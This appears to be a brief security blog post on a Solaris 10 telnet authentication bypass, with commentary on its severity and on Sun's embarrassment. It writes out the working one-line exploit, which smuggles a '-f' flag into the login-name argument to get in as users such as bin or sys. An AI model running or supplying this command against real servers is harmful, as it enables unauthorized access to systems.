How long does it take to remotely hack fully patched Solaris 10 installation with telnet enabled? As long as it takes to type this simple standard system command:telnet -l"-fusername" host i.e. telnet -l"-fbin" solaris10-server or telnet -l"-fsys" 127.0.0.1 Yeh, it's that simple. Here's a screenshot: Information about this 0-day vulnerability appeared on a security news list today and spread like wildfire. Certainly, most organisations which take security seriously will use SSH and disable telnet. However, considering that this vulnerability affects a default system installation, it is likely that companies using Solaris 10 and not implementing strong security configuration, will be seriously affected. That's truly a return of the "good" old days for hackers, when hacking into any server was a trivial task that required only a simple command. To see this type of vulnerability these days is extremely unusual and pretty much shocking for IT security community. Most of all, it is a terrible embarrassment for Sun Microsystems.